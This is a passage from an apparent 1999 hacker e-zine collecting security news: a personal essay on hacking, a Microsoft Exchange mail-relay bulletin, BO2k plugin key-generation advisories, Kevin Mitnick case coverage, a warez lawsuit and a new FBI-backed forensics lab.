so you buy a synthesizer and learn all about electronic music,
you start hacking analog modules and build a nicer synth than you
could buy! Then you interface it to a MIDI port on a cheap 286AT
and then hack up some sequencer software, or buy some and then
disassemble it to fix all the bugs! You keep reading...
By now most of your friends are also "far into the pudding", you
have either gained 50 lbs or gone totally skinny...your skin tone
is 2 shades lighter from being indoors so long...most of the opposite
sex is either totally freaked by or with you - they either dig you,
or they dont!...you're probably knocking on the door of what will
be a $60K+/yr job as a systems analyst...and you are well-aware that
90% of the people in this world can't talk their way out of a badly
cooked steak at the local eatery, let alone install a new motherboard
in their PC! So you pick up some extra cash on doing shit like that
for the straights...you keep reading, and RTFM'ing higher and higher,
learning about networks...the VCR breaks down and your SO bitches
about having to wait till monday to have it fixed...you fix it in
about 40 minutes....the next day the clothes dryer starts to make
squeeking noises like a 50' mouse, you've never fixed one before -
but somehow it's not that difficult to open the bastard up and find
the squeek and fix it...and suddenly it dawns on you that hacking
code or hardware is pretty much the same! You keep reading...
Congrats, you are now a real hacker. Absolutly nothing but a lack of
time (or in some cases money) can stop you. You are a true Technologic
Philosopher...you can function in places a mere Engineer or Scientist
would truly FEAR TO TREAD! You can read better than Evelyn Wood, you
have a collection of tools that would make a Master Machinist and a
Prototype EE or ME cry. You can calculate series and parallel resonant
circuits in your head. You can fix any consumer appliance - if you can
get the parts. Your car has either become one of your main hacks or
you'ver deligated the job to a mechanic who you have found to be a
fellow hacker; and you work on his homebrew 68010 unix box...because
you've got a 68010 emulator and he works on your car because that's
the kind he specializes in! Maybe you trade services with people
for 50% of what ordinary people have to BUY WITH CASH!...you keep
reading...
(this is the stage where the author now finds himself...16 years
into a career at a Fortune 5 company and age 42...still reading...
your mileage may vary! <-((that's my code too! I co-wrote VEEP,
(vehicle-economy-emissions-program, a complete auto-simulator,
written in Fortran-5 for the Univac 1108 system using punch-cards!)
for the Ford Foundation and the DOT while at JPL in 1973)) )
-Avatar-> (aka: Erik K. Sorgatz) KB6LUY +----------------------------+
TTI(es@soldev.tti.com)or: sorgatz@avatar.tti.com *Government produces NOTHING!*
3100 Ocean Park Blvd. Santa Monica, CA 90405 +----------------------------+
(OPINIONS EXPRESSED DO NOT REFLECT THE VIEWS OF CITICORP OR ITS MANAGEMENT!)
@HWA
04.0 Microsoft security bulletin: Encapsulated SMTP address vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Microsoft Security Bulletin (MS99-027)
--------------------------------------
Patch Available for "Encapsulated SMTP Address" Vulnerability
Originally Posted: August 06, 1999
Summary
======
Microsoft has released a patch that eliminates a security vulnerability in Microsoft� Exchange� Server. The vulnerability could allow an attacker
to perform mail relaying via an Exchange server that is configured to act as a gateway for other Exchange sites using the Internet Messaging
Service.
Frequently asked questions regarding this vulnerability can be
found at http://www.microsoft.com/security/bulletins/MS99-027faq.asp
Issue
====
Exchange Server implements features designed to defeat "mail relaying", a practice in which an attacker causes an e-mail server to forward mail
from the attacker, as though the server were the sender of the mail. However, a vulnerability exists in this feature, and could allow an attacker to
circumvent the anti-relaying features in an Internet-connected Exchange Server.
The vulnerability lies in the way that site-to-site relaying is performed via SMTP. Encapsulated SMTP addresses could be used to send mail to
any desired e-mail address. The patch eliminates the vulnerability by making encapsulated SMTP addresses subject to the same anti-relay
protections as non-encapsulated SMTP addresses.
Affected Software Versions
=========================
Microsoft Exchange Server 5.5
Patch Availability
=================
ftp://ftp.microsoft.com/bussys/exchange/exchange-public
/fixes/Eng/Exchg5.5/PostSP2/imc-fix
NOTE: Line breaks have been inserted into the above URL for readability.
More Information
===============
Please see the following references for more information related to this issue.
Microsoft Security Bulletin MS99-027: Frequently Asked Questions, http://www.microsoft.com/security/bulletins/MS99-027faq.asp.
Microsoft Knowledge Base (KB) article Q237927,
XIMS: Messages Sent to Encapsulated SMTP Address Are Rerouted Even Though Rerouting Is Disabled,
http://support.microsoft.com/support/kb/articles/q237/9/27.asp.
Microsoft Security Advisor web site,
http://www.microsoft.com/security/default.asp.
Obtaining Support on this Issue
==============================
This is a fully supported patch. Information on contacting Microsoft Technical Support is available at
http://support.microsoft.com/support/contact/default.asp.
Acknowledgments
==============
Microsoft acknowledges Laurent Frinking of Quark Deutschland GmbH for bringing this issue to our attention and working with us to alert
customers about it.
Revisions
========
August 06, 1999: Bulletin Created.
-----------------------------------------------------------------------
THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND.
MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY
DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL
DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO
THE FOREGOING LIMITATION MAY NOT APPLY.
� 1999 Microsoft Corporation. All rights reserved.
@HWA
05.0 Disrupting Net Access a Cybercrime?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by D----Y
--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------
Disrupting Net access a cybercrime?
By Robert Lemos, ZDNN
August 6, 1999 3:28 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2310624,00.html
A former system administrator of the University of Oklahoma has been charged under the state's
computer-crime statutes with slowing the university's network to a crawl.
Ryan Breding, 25, faces a single count of disrupting the university's Internet service in 1997, when
hoards of incoming students downloaded pirated software from servers that he had allegedly set
up on the university's network.
"There were times when the authorized users -- students -- were not able to access the Internet at
all," said Scott Palk, first assistant attorney general for Oklahoma's Cleveland County District
Attorney's Office.
Known as warez (pronounced "wares"), the software is identical to store-bought versions and
includes serial numbers to spoof the copy protection mechanisms. The downloads overloaded the
network, and many students were denied access.
Getting up to speed
While distributing such software is illegal, the district attorney's office has only charged Breding
with interfering with network operation. On that charge alone, the former employee faces up to 10
years in the state penitentiary and up to $100,000 in fines.
The Oklahoma Computer Crimes Act of 1984 makes it a felony to "willfully and without
authorization disrupt or cause the disruption of computer services or deny or cause the denial of
access or other computer services to an authorized user of a computer, computer system or
computer network."
An initial lack of familiarity with computer crimes stymied the investigation. State investigators and
prosecutors needed to learn how to pursue digital criminals and examine the evidence.
"These are new crimes -- at least locally," said Palk. "Some people had to undergo training to look
into it."
Palk stressed that, for the investigators, the case was a necessary learning experience. "This may
be a hallmark of things to come," he said. "And we need to be ready."
University officials would not comment for this story. A preliminary hearing is set to start on Aug.
17.
@HWA
06.0 IDEA CAST BO2K PLUGIN VULNERABILITY
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.securityfocus.com/
BO_CAST Plug-in Identical Key Vulnerability
Bugtraq ID: 561
Remote: Yes
Date Published: 08/04/99
Relevant URL:
http://www.securityfocus.com/level2/?go=vulnerabilities&id=561
Summary:
The BO_CAST plugin for BO2k has a vulnerability that causes any password
to generate the same CAST-256 key. Daniel Roethlisberger has released an
updated version, BO_CAST 2.3 . It is available for download at:
http://www.roe.ch/download/bo_cast.shtml
IDEA BO2k Plug-in Identical Key Vulnerability
Bugtraq ID: 562
Remote: Yes
Date Published: 08/04/99
Relevant URL:
http://www.securityfocus.com/level2/?go=vulnerabilities&id=562
Summary:
The IDEA encryption plug-in for BO2k version 0.3 has a flaw which causes
any password to generate the same key.Maw~ has released version 0.4 which
does not have this vulnerability. It is available at:
http://www.wynne.demon.co.uk/maw/
@HWA
07.0 Mitnick gets a welcome birthday present from the LA DA
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Http://www.hackernews.com
Mitnick Gets Birthday Present from LA DA - Federal Sentencing Set For Today
contributed by evenprime and turtlex
The Los Angels District Attorney has given Kevin a
surprise but welcome birthday present by dropping the
state charges against him. Last Friday, Kevin's fifth
birthday behind bars, the LA DA claimed that the
six-year old case had been mischarged. Kevin had been
charged with one count of illegally accessing a
Department of Motor Vehicles computer and retrieving
confidential information. (Which means he (or someone
else) tricked a DMV employee over the phone into
faxing him information) This action clears the way for
Kevin to be released to a halfway house after his federal
sentencing.
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2310792,00.html
News.com
http://www.news.com/News/Item/0,4,40234,00.html?tt.abc..ticker.ne
MSNBC
http://www.msnbc.com/news/298088.asp
Yahoo News
http://dailynews.yahoo.com/h/zd/19990806/tc/19990806375.html
Federal Sentencing Hearing Set For Today
Once again Kevin Mitnick is scheduled to be sentenced
for his federal charges. While he has already pleaded
guilty and has accepted time served plus probation as
punishment the issue of restitution still needs to be
decided. The hearing will be held today (Monday) at
1:30 pm in Courtroom 12 at the LA Federal Courthouse,
312 N. Spring Street.
FREE KEVIN
http://www.freekevin.com/
ZDNET;
--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------
L.A. district attorney drops Mitnick case
By Paul Elias, ZDNN
August 6, 1999 6:09 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2310792,00.html?chkpt=hpqs014
The Los Angeles district attorney gave Kevin Mitnick a birthday present Friday, dropping its
six-year-old computer hacking case against the convicted hacker.
That development could speed the release of the 35-year-old, removing an obstacle that could
have prevented Mitnick from going free from federal prison soon after he is formally sentenced
Monday in an unrelated federal case.
"We're ecstatic," said Carolyn Hagin, one of Mitnick's attorneys in the state case.
Deputy District Attorney Daniel Bershin said he dropped the state case because it had been
"mischarged."
Dubious 'computer' crime
In 1993, the district attorney charged Mitnick with one count of illegally accessing a Department
of Motor Vehicles computer and retrieving confidential information. The problem with that charge
is that Mitnick, posing as a Welfare Fraud investigator, simply picked up a telephone on Dec. 24,
1992, and duped an employee accessing the DMV computer for him.
"Since Mitnick did not personally connect to the DMV computer, but either he or someone else
communicated with the DMV technician via a telephone conversation," Bershin wrote in his
motion to dismiss the case, "it would be difficult to prove that Mitnick gained entry to the DMV
computer, or that he instructed or communicated with the logical, arithmetical or memory function
resources of the DMV computer."
Bershin also confirmed at a July 28 hearing what many of Mitnick's supporters have been claiming
f*or years: that their martyr has been the target of overzealous prosecution.
Bershin first informed Los Angeles County Superior Court Judge Leland Harris of the district
attorney's intention to drop the case at the July 28 hearing, a position that caught Harris off guard.
As early as July 7, Deputy District Attorney Larry Diamond -- who had originally handled
Mitnick's case -- was vigorously arguing against any reduction in Mitnick's $1 million bail pending
trial.
Judge 'curious'
"So I'm curious as to why all of a sudden between July 7 and July 28 we have this radical change
in position," the judge asked of Bershin.
"Well, I think to be quite candid, the answer, or course, is Mr. Diamond," Bershin said. "I know
that Mr. Diamond has wanted to handle this matter personally for a long time ... and I know that
Mr. Diamond personally believes that Mr. Mitnick has been skating through the system for a long
time and has a great interest in him."
At that July 28 hearing, Harris refused to dismiss the case, saying to do so would be "a radical
jump off the precipice to move to dismiss at this time." He ordered Bershin to submit a written
motion to dismiss, which Harris granted Friday.
Halfway house an option
Harris' action clears the way for Mitnick's freedom. He is due to be sentenced in federal court for
several hacking charges he pleaded guilty to in March. His attorney in the federal case, Donald
Randolph of L.A.'s Randolph & Levanas, said he will ask Central District Judge Mariana Pfaelzer
to order Mitnick into a halfway house after formally sentencing him to 68 months in prison.
Randolph said he is optimistic Pfaelzer will grant the request, but if she doesn't Mitnick is set to go
free sometime in January.
Still at issue is the amount of money Mitnick must repay in restitution. His victims, including several
high-tech giants such as Sun Microsystems (Nasdaq:SUNW) and Motorola Corp.
(NYSE:MOT), say that Mitnick's hacking cost them millions of dollars in compromised intellectual
property.
Federal prosecutors are seeking $1.5 million in restitution. Mitnick, through Randolph, argues that
he is leaving prison broke and that conditions of his probation, once he is released, severely
restrict his access to a computer, the only way he knows how to make a living.
Pfaelzer has indicated that she will order Mitnick to make some restitution, which she is scheduled
to decide Monday as well.
Mitnick was arrested in 1995 after a high-profile, two-year, electronic manhunt for him.
-=-
News.com
District attorney drops Mitnick case
By Dan Goodin
Staff Writer, CNET News.com
August 6, 1999, 7:35 p.m. PT
The Los Angeles district attorney's office has dropped state charges against Kevin Mitnick, the notorious hacker who
pleaded guilty in March to wire fraud and other federal charges, according to a published report.
Mitnick, who will receive a five-year sentence if a federal judge accepts the plea, could be released from jail early next year. He
has been held in federal custody since he was captured in a high-profile investigation in 1995. He also faced separate state
charges as well.
But Deputy District Attorney Daniel Bershin said today he was dropping those charges, because they had been "mischarged," ZD
Network News is reporting. The case stemmed from 1993 charges that Mitnick unlawfully accessed computers at the state
department of motor vehicles.
Bershin admitted in a brief filed today that the case was flawed because Mitnick never accessed the computer himself, but
allegedly used posed as a welfare fraud inspector over the phone in order to get a DMV to retrieve information, ZDNN said.
Mitnick is scheduled to appear in federal court in Los Angeles this Monday for sentencing before U.S. District Judge Mariana
Pfaelzer.
-=-
Kevin Mitnick appears at a hearing shortly after his
arrest on Feb. 15, 1995, in Raleigh, N.C.
L.A. drops Mitnick case Action could pave way
for hacker�s freedom
By Paul Elias
ZDNN
AUG. 3 � The Los Angeles district attorney gave
Kevin Mitnick a birthday present Friday,
dropping its six-year-old computer hacking case
against the convicted hacker. That development
could speed the release of the 35-year-old
hacker, removing an obstacle that could have
prevented Mitnick from going free from federal
prison soon after he is formally sentenced
Monday in an unrelated federal case.
"Internet Underground"
Hackers: Knights-errant or knaves?
Will hackers or spies knot the Net?
Deputy District
Attorney Daniel
Bershin said he
dropped the state
case because it
had been
mischarged.
�WE�RE ECSTATIC� said Carolyn Hagin, one of
Mitnick�s attorneys in the state case.
Deputy District Attorney Daniel Bershin said he
dropped the state case because it had been �mischarged.�
In 1993, the district attorney charged Mitnick with one
count of illegally accessing a Department of Motor Vehicles
computer and retrieving confidential information. The
problem with that charge is that Mitnick, posing as a
Welfare Fraud investigator, simply picked up a telephone
on Dec. 24, 1992, and duped an employee accessing the
DMV computer for him.
�Since Mitnick did not personally connect to the DMV
computer, but either he or someone else communicated with
the DMV technician via a telephone conversation,� Bershin
wrote in his motion to dismiss the case, �it would be difficult
to prove that Mitnick gained entry to the DMV computer,
or that he instructed or communicated with the logical,
arithmetical or memory function resources of the DMV
computer.�
MSNBC's Michael Brunker reports on
Mitnick's plea bargain deal with the federal
government
Bershin also confirmed at a July 28 hearing what many
of Mitnick�s supporters have been claiming for years: that
their martyr has been the target of overzealous prosecution.
Bershin first informed Los Angeles County Superior
Court Judge Leland Harris of the district attorney�s intention
to drop the case at the July 28 hearing, a position that
caught Harris off guard.
RADICAL CHANGE IN POSITION
As early as July 7, Deputy District Attorney Larry
Diamond � who had originally handled Mitnick�s case �
was vigorously arguing against any reduction in Mitnick�s $1
million bail pending trial.
�So I�m curious as to why all of a sudden between July
7 and July 28 we have this radical change in position,� the
judge asked of Bershin.
�Well, I think to be quite candid, the answer is, of
course, Mr. Diamond,� Bershin said. �I know that Mr.
Diamond has wanted to handle this matter personally for a
long time ... and I know that Mr. Diamond personally
believes that Mr. Mitnick has been skating through the
system for a long time and has a great interest in him.�
At that July 28 hearing, Harris refused to dismiss the
case, saying to do so would be �a radical jump off the
precipice to move to dismiss at this time.� He ordered
Bershin to submit a written motion to dismiss, which Harris
granted Friday.
MITNICK�S FREEDOM?
Harris� action clears the way for Mitnick�s freedom.
He is due to be sentenced in federal court for several
hacking charges he pleaded guilty to in March. His attorney
in the federal case, Donald Randolph of L.A.�s Randolph &
Levanas, said he will ask Central District Judge Mariana
Pfaelzer to order Mitnick into a halfway house after formally
sentencing him to 68 months in prison.
Randolph said he is optimistic Pfaelzer will grant the
request, but if she doesn�t Mitnick is set to go free
sometime in January.
Still at issue is the amount of money Mitnick must repay
in restitution. His victims, including several high-tech giants
such as Sun Microsystems and Motorola Corp. say that
Mitnick�s hacking cost them millions of dollars in
compromised intellectual property.
Federal prosecutors are seeking $1.5 million in
restitution. Mitnick, through Randolph, argues that he is
leaving prison broke and that conditions of his probation,
once he is released, severely restrict his access to a
computer, the only way he knows how to make a living.
Pfaelzer has indicated that she will order Mitnick to
make some restitution, which she is scheduled to decide
Monday as well.
Mitnick was arrested in 1995 after a high-profile,
two-year, electronic manhunt for him.
� 1999 ZDNet. All rights reserved. Reproduction in
whole or in part in any form or medium without express
written permission of ZDNet is prohibited
@HWA
08.0 An Accurate Look At Mitnick's Life Behind Bars
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by staff
There have been a few articles floating around the web
that attempt to describe what Kevin is going through
and the experiences he must endure. This one appears
to be the most accurate and is based off only the third
Mitnick interview granted to a media organization.
Aviary Mag
http://aviary-mag.com/News/Mitnick_Life/mitnick_life.html
Kevin Mitnick�s Life -- Life in and around 6 South, 626
ATTRITION Staff
Recently, two of the Attrition Staff writing for OSAll caught up with
Kevin Mitnick and asked a few more questions about his living
conditions. We presented him with an article by Kimberly Tracey (-1-)
to establish a baseline for our talk and a reason for this followup.
Life as it REALLY stands
Here's a little bit about Kevin Mitnick's life at the Los Angeles Metro
Detention Center (MDC), a bit more up to date:
At the MDC there IS a yard for exercising. It is called the "rec deck"
(Recreation Deck), rather than a yard and offers fresh air and sunlight,
through a protected metal grating. On this patio Kevin has the option of
playing basketball, walking or using the universal weights.
The call for "lockup"(-1-) (known as 'lockdown' in most prisons
including MDC) means that inmates must return to their cells. This is
typically done for a count to ensure all inmates are still within the confines
of the prison, or if any of the individuals get out of control. The times
when they are all rounded up on the balcony means they are 'tossing
cells' or doing a 'shakedown' (looking for contraband items).
There are two 'units' per floor. Each unit has three TV's giving a total of
six per floor. However, inmates from one unit may not use the resources
from (or visit) another unit. Short of personal or legal visits (or court
appearances), they do not leave their unit.
As of May 24th, the vending machines were removed from the floors.
Despite this, the microwaves (2 per unit) are still available. Along with
the removal of vending, many items were added to the commissary.
"I never buy food from the guards. No inmates including me
purchase food or any items from MDC staff. It's strictly
forbidden," Kevin says.
The only source for Kevin to buy food is the commissary which offers a
small variety of food (as well as toiletry items).
We learned that the MDC does offer a couple exercise bikes that still
work. "I use them all the time," Kevin smiles.
While using one of the four phones in his unit, he often brings a stool
from his cell to make the calls a bit more comfortable. Often times, the
phones are turned on as early as 6am he says. The practice of 'buying'
phone time is frowned upon by MDC staff.
"The MDC does not allow inmates to have any cash or change,
money is contraband so it's impossible to buy phone time for a
'few extra dollars,'" Kevin reports.
Since February, Kevin has been able to use the government approved
laptop on weekdays, with appropriate supervision. This time is usually
spent sorting through the many gigs of evidence in preparation for his
case. Now that a plea has been entered, time is spent making a much
more educated guess at the actual damage figures being leveled at him.
Unfortunately, the friendly advice about tapes and videos that was
offered by Ms. Tracey is a bit inaccurate.
"I appreciate any tapes or CD's, however, I'll have to wait until
I'm released before I can listen to them."
Kevin has no resource to play tapes or videos with or without his
defense team present.
No Place Like Home
Each day that Kevin comes down to the visiting room, he carries a
cardboard box overflowing with legal declarations, printed evidence,
news articles and more. Ten minutes later, one of the MDC staff bring
him the government approved laptop so that he can examine the bulk of
the evidence. Outfitted with a locking device preventing floppy use,
Kevin can only receive programs and evidence via CDROM. Dual
booting into Redhat Linux and Windows 95, he is able access almost all
of the evidence. To be more accurate, he can not access any of the
evidence from the VMS backup tapes, megs of logs from various CDs,
and of course the evidence still not provided by the government.
After visiting his direct family or legal staff, Kevin returns to what he has
been forced to call 'home' for four years, five months, and twenty one
days. Not that he or anyone else is counting. Home is a cell smaller than
the largest of private visitation rooms reserved for legal visits. Those
rooms are perhaps 8x10, and yet still larger than Kevin's cell (that he
shares with one other inmate). Cell #626 sits off the 'common area' and
is seperated by a wooden door with a narrow glass window, offering
less view than the narrow window that grants him a peek of the Roybal
Federal Building. Along with the other inmate, the tiny cell has two
bunks, a toilet, sink, all acceptable personal possessions and a tendancy
to give people a cramped feeling.
The common area is available to inmates from roughly 6:30 to 9:45. This
area contains the bikes, microwaves, televisions and phones. Also
provided are billiards and ping pong tables. While the common area may
sound fun and recreational, it is not condusive to those trying to read or
study legal briefs.
Kevin's cell has a lovely view of the sixth floor of the Roybal Federal
Building. A building with more stringent metal detectors than the MDC
even. Even from the sixth floor, he gets to view more federal offices.
A Day in the Life of..
With a better image of the material life surrounding Kevin, hopefully it
will be easier to envision a typical day.
6:30 - wake up sign up for phone time (typically two 20 minute
blocks)
7:00 - light breakfast (example: pastry and milk)
7:45 - head to patio, walk for half an hour
8:15 - weight lifting on patio
10:20 - use part of phone time
10:40 - grab lunch tray (example: eggs, burrito, potatoes, milk)
lockdown for lunch
12:00 - "boring time" legal visits, phone calls, lay out in sun, read,
socialize
3:45 - lockdown for count
4:45 - grab dinner tray for later use part of phone time
6:00 - ride bike, exercise
7:30 - shower eat dinner
9:45 - lockdown shave, read
11:00 - sleep
During most of his workouts, Kevin is able to listen to an AM/FM
walkman. For those of you interested in his music selection, his radio is
programmed with the following stations:
#1 93.1
#2 95.5 (KEZY)
#3 103.1
#4 106.7 (KROQ)
#5 98.7 (STAR)
Drop Him A Line
The letters and comments he receives are an uplift to say the least.
Continued support and cards are welcome and he sends his thanks to
the many people who have written him. Kevin enjoyed his birthday on
August 6th, especially when the State of California opted to drop the
outstanding charges leveled at him some seven years prior. Despite his
birthday passing, cards or words of encouragement would be a great
gift. Federal judge M. Pfaelzer sentencing him to the defense proposed
restitution and 'time served' would be the best gift though. ;) If that is too
much to ask, recommending his immediate release to a half way house
would be acceptable.
As Ms. Tracey said, sending him money via postal money orders is
appreciated so that he can enjoy it right away. Another way to support
Kevin is to purchase 'Free Kevin' bumper stickers from
www.freekevin.com as the profit goes toward his legal defense fund. For
those not keeping up, Kevin is due to be sentenced on Monday, August
9th at 1:30pm. Judge Pfaelzer can be found at the US Court House
(-2-), room 12.
Kevin Mitnick
89950-012
P.O. Box 1500
Los Angeles, CA 90053
Both of us have spent long hours locked in a government SCIF on
previous security contracts. We were paid to be in these small
depressing rooms and hack military networks. I could barely stand 8
hours in those 10x10 rooms full of computers with no windows. Now,
Kevin gets to sit in his less than 10x10 cell for allegedly hacking other
networks. It's sick and ironic.
@HWA
09.0 Sony and EA Take Down Paradigm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by km
Sony Computer Entertainment America and Electronic
Arts have recently filed suit against alleged members of
the warez group Paradigm in the U.S. District Court for
the Northern District of California. The suit alleges that
members of the group infringed on the copyrights and
trademarks by distributing unauthorized copies of
software from the two companies. United States
Marshals recently conducted a court-sanctioned seizure
and impounded evidence at the location of a participant
of the group. SCEA and EA plan to continue the civil
case against the pirates, they will also cooperate with
law enforcement in the United States and will be turning
over evidence to authorities in several other countries
for possible criminal action against other group
members.
Yahoo Biz News
http://biz.yahoo.com/bw/990806/ca_sony_co_1.html
Friday August 6, 8:05 am Eastern Time
Company Press Release
Electronic Arts and Sony Computer Entertainment America Nab Internet
Pirate Ring
Companies file joint lawsuit against online pirates
REDWOOD CITY, Calif. and FOSTER CITY, Calif.--(BUSINESS WIRE)-- August 6, 1999--Declaring war on a major Internet pirate ring that illegally
uploaded, traded and distributed copies of their software, U.S.-based Electronic Arts(tm) (Nasdaq:ERTS - news), the industry's largest entertainment software
publisher, and Sony Computer Entertainment America (SCEA), the company behind the PlayStation� game console, the world's best-selling videogame system,
recently filed suit against certain alleged members of the ring in the U.S. District Court for the Northern District of California. Among other claims, the complaint
asserts the defendants infringed the copyrights and trademarks of the two companies through the copying and distribution of software owned by Electronic Arts and
SCEA.
United States Marshals and lawyers for the companies recently conducted a court-sanctioned seizure and impounded evidence at the location of a participant of the
group that calls itself ``Paradigm.'' During the seizure, a computer, hard drives, CDs and other items related to the illegal operation were impounded by the Marshals.
The complaint further notes that the seizure, as well as the investigation which preceded it, produced a significant amount of evidence against members of the
worldwide ring located in the United States, Canada, the United Kingdom, Germany, the Netherlands, Denmark, Norway, Portugal, Sweden, Russia and other
locations. The evidence identified by true name and location dozens of participants in the distribution of pirated software belonging to the companies.
While SCEA and Electronic Arts plan to continue the civil case against the pirates, they also continue to cooperate with law enforcement in the United States and will
be turning over evidence to authorities in several of the other relevant countries for possible criminal action against the group's members.
``Putting an end to software piracy is a top priority for our industry,'' said Ruth Kennedy, senior vice president and general counsel, Electronic Arts. ``Electronic Arts
and SCEA believe that the break up of pirate Internet rings like this will be key to our success in combating the rising problem of Internet piracy. This action is part
of our ongoing plan to find and prosecute these thieves.''
``Piracy of packaged entertainment software last year amounted to over US$3.2 billion worldwide for our industry alone. Electronic Arts alone lost more than $400
million. Internet pirate rings like Paradigm contribute to these losses by uploading games where the industrial pirates in places such as Asia or Russia can download
them, turn them into copies of packaged goods and rush them to the street -- sometimes even before we get the legitimate goods to market,'' Kennedy noted.
Pre-release or day-of-release software is highly prized by pirate Internet rings, that compete for ``points'' in the pirate community by being the first to ``release'' an
illegal version of the product, often with copy protection and other content removed.
Both companies praised the recently announced criminal ``I.P. Initiative'' by federal authorities including the Department of Justice, the FBI, and U.S. Customs,
which as its goal has increased criminal prosecutions of pirates of intellectual property.
According to Riley Russell, vice president of legal and business affairs, Sony Computer Entertainment America, ``We will work diligently to ensure that these
counterfeiters are fully prosecuted and that others who think Internet piracy and `trading' is acceptable will think again.'' Russell noted that last year alone,
counterfeiting cost SCEA and Electronic Arts losses of several hundreds of millions of dollars around the globe.
Other Internet rings besides Paradigm that are also believed to be involved in the pirating of entertainment software include groups calling themselves ``Razor 1911,''
``Class,'' ``Origin,'' ``Hybrid'', ``Divine'', ``Fairlight'' and others, with members based in the United States and in many other countries around the world. The
companies are confident evidence developed in the current case as well as continuing efforts by the entertainment software industry will result in additional civil
actions and criminal prosecution of members of these groups in the future.
Electronic Arts, headquartered in Redwood City, California, is the world's leading interactive entertainment software company. Founded in 1982, Electronic Arts
posted revenues of more than $1.2 billion for fiscal 1999. The company develops, publishes and distributes software worldwide for personal computers and video
game systems. Electronic Arts markets its products under seven brand names: Electronic Arts, EA SPORTS(tm), Maxis(tm), ORIGIN(tm), Bullfrog(tm)
Productions, Westwood Studios(tm) and Jane's� Combat Simulations. More information about EA's products and full text of press releases can be found on the
Internet at http://www.ea.com.
Sony Computer Entertainment America, a division of Sony Computer Entertainment America Inc., markets the PlayStation game console for distribution in North
America, develops and publishes software for the PlayStation game console, and manages the U.S. third party licensing program. Based in Foster City, Calif., Sony
Computer Entertainment America Inc. is a wholly-owned subsidiary of Sony Computer Entertainment Inc.
Note to Editors: Electronic Arts, EA SPORTS, Maxis, ORIGIN, ORIGIN Systems, Bullfrog and Westwood Studios are trademarks or registered trademarks of
Electronic Arts in the United States and/or other countries. Jane's is a registered trademark of Jane's Information Group, Ltd. PlayStation is a registered trademark
of Sony Computer Entertainment Inc.
Contact:
Electronic Arts
Pat Becker, 650/628-7832
or
Sony Computer Entertainment America
Molly Smith, 650/655-6044
10.0 Regional Computer Forensics Lab Set Up in San Diego
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by bluesky
With $600,000 provided by two federal grants officials
have set up the San Diego Regional Computer Forensics
Laboratory with the support of 32 federal, state and
local law enforcement agencies. The lab will be manned
by 14 FBI trained specialists from local police agencies,
including the San Diego Police Department and the
Sheriff's Department. The lab will conduct
court-approved wiretap operations that call for
intercepting Internet communications as well as data
recovery and analysis from seized computer systems.
San Diego Union Tribune
http://www.uniontrib.com/news/uniontrib/fri/metro/news_2m6lab.html
First regional computer crime
laboratory set up in San Diego
Forensic team will retrieve electronic
evidence for use in trials
By Bruce V. Bigelow
STAFF WRITER
August 6, 1999
Overwhelmed by the use of computers in illegal activities, federal authorities
have formed a regional crime lab in San Diego that specializes in retrieving
computerized data and preserving the evidence for trial.
The San Diego Regional Computer Forensics Laboratory is being hailed by
organizers as the first of its kind, and it already has become a nationwide
model for law enforcement in other cities -- even before its FBI-trained
specialists have received their first case.
The lab also is expected to eventually conduct court-approved wiretap
operations that call for intercepting Internet communications.
"All of us involved in the investigation and prosecution of computer crime view
the San Diego lab as a prototype of what we hope to establish in various
jurisdictions around the country," said David Schindler, a federal prosecutor in
Los Angeles who won convictions of Kevin Mitnick and other notorious
hackers.
Most of the lab's 14 forensic specialists are sworn officers from local police
agencies, including the San Diego Police Department and the Sheriff's
Department. The lab's electronic infrastructure was designed by computer
security experts at the Navy's Space and Naval Warfare Systems Command
headquarters.
"This is extremely important, not just a little important," said Alan Paller, a
computer security expert at the SANS Institute, an international research and
education cooperative for more than 60,000 system administrators.
"The vast majority of discoveries (of network intrusions) go unresolved
because there are no resources outside the FBI of any scale. If the probability
of getting caught and put in jail is far-removed, why worry?"
About $600,000 needed to renovate FBI offices and equip the facility was
provided by two federal grants, said Mitch Dembin, an assistant U.S. attorney
in San Diego who proposed the idea.
"I sold this idea to the individuals who are doing this on their own in the
wilderness of their own departments, and then I sold the idea to the
department heads in those agencies," Dembin said.
A total of 32 federal, state and local law enforcement agencies have agreed to
support the lab, he added.
"The idea is one I very much agree with," said Doug Tygar, a professor of
computer science at the University of California Berkeley who specializes in
computer security. "Unless they have the ability to deal with digital data, digital
transactions, law enforcement agencies are going to be behind the curve."
While the FBI established a computer forensics lab at its Washington
headquarters years ago, experts say the agency also has maintained tight
controls over the software tools used by its forensic specialists.
"Until now, the FBI only trained its own people," Dembin said.
